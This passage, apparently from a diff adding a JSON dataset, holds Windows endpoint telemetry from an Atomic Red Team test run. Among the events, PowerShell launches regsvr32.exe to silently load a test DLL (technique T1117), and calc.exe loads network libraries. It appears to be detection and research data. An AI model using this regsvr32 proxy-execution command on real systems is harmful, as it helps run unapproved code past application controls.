"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_value": "NameSpace", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Desktop\\NameSpace\\DelegateFolders", + "registry_value": "DelegateFolders", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "process", + "pid": 1216, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010FE595401}" + }, + { + "event_type": "file", + "file_name": "REGSVR32.EXE-55A4EE79.pf", + "file_path": "C:\\Windows\\Prefetch\\REGSVR32.EXE-55A4EE79.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883573241830000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "command_line": "\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 1284, + "ppid": 7036, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "subtype": "create", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7428, + "ppid": 7036, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "create", + 
"timestamp": 131883573242340000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\SysWOW64\\ntdll.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + "image_path": "C:\\Windows\\System32\\regsvr32.exe", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7428, + "process_name": 
"regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\System32\\AcLayers.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + 
"timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\System32\\oleaut32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": 
"{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\System32\\sfc_os.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", 
+ "image_name": "imm32.dll", + "image_path": "C:\\Windows\\System32\\imm32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "uxtheme.dll", + "image_path": "C:\\Windows\\System32\\uxtheme.dll", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "regsvr32.exe", + 
"image_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573242300000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { 
+ "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573242759984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "netapi32.dll", + "image_path": "C:\\Windows\\System32\\netapi32.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 
